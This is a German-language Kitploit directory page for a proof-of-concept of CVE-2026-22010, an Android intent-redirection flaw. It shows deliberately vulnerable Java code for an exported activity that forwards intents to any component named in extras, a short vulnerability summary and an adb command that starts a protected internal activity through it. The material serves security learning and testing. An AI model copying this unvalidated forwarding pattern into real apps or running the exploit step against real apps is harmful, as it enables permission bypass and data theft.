Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-22010-Android-Intent-Redirection-to-Exported-Component — Proof-of-Concept für CVE-2026-22010 Android Intent-Redirection: demonstriert eine exportierte Aktivität, die Intents an angreiferkontrollierte interne Komponenten weiterleitet, Sicherheitsprüfungen umgeht, mit anfälligem Java-Code und adb-Exploit-Schritten. | Kitploit
Tools/GitHubGitHub/george0papasotiriou/cve-2026-22010-android-intent-redirection-to-exported-component
Android-SicherheitSchwachstellenanalyseExploitationMobile App-PenetrationstestsMobile SicherheitLernen & Bildung
GitHubgeorge0papasotiriou/cve-2026-22010-android-intent-redirection-to-exported-component

CVE-2026-22010-Android-Intent-Redirection-to-Exported-Component

Proof-of-Concept für CVE-2026-22010 Android Intent-Redirection: demonstriert eine exportierte Aktivität, die Intents an angreiferkontrollierte interne Komponenten weiterleitet, Sicherheitsprüfungen umgeht, mit anfälligem Java-Code und adb-Exploit-Schritten.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
14vor 1 MonatNoch nicht geprüft

CVE-2026-22010 – Android Intent Redirect zu exportierter Komponente

Programmcode (Java/Android-Simulation)

root@kitploit:~
// VulnActivity.java - Exported activity that forwards intents
public class VulnActivity extends Activity {
    @Override
    protected void onCreate(Bundle b) {
        super.onCreate(b);
        Intent incoming = getIntent();
        // Retrieve target component from extras
        String targetPkg = incoming.getStringExtra("pkg");
        String targetCls = incoming.getStringExtra("cls");
        Intent forward = new Intent();
        forward.setClassName(targetPkg, targetCls);
        // Copy all extras from original intent
        forward.putExtras(incoming);
        startActivity(forward);
    }
}

CVE-2026-22010 – Android Intent Redirect zu exportierter Komponente

Severity: High

Übersicht

Eine exportierte Android-Activity leitet eingehende Intents blind an eine Komponente weiter, die in den Extras des Intents angegeben ist. Ein Angreifer kann einen Intent konstruieren, der die App dazu veranlasst, eine geschützte interne Activity mit vom Angreifer kontrollierten Daten zu starten und dabei Berechtigungsprüfungen zu umgehen.

Schwachstellendetails

  • Typ: Intent Redirect / Berechtigungsumgehung
  • Auswirkung: Zugriff auf private Komponenten, Datendiebstahl.
  • Grundursache: Die App validiert die Zielkomponente (Paket- und Klassenname) nicht, bevor sie den Intent weiterleitet.

Exploit-Demonstration

Stellen Sie die verwundbare App auf einem Android-Emulator bereit. Senden Sie einen Intent über adb:

root@kitploit:~
adb shell am start -n com.example/.VulnActivity --es pkg com.example.internal --es cls com.example.SecretActivity

Die interne Activity wird ohne entsprechende Berechtigungen gestartet.

Tool herunterladen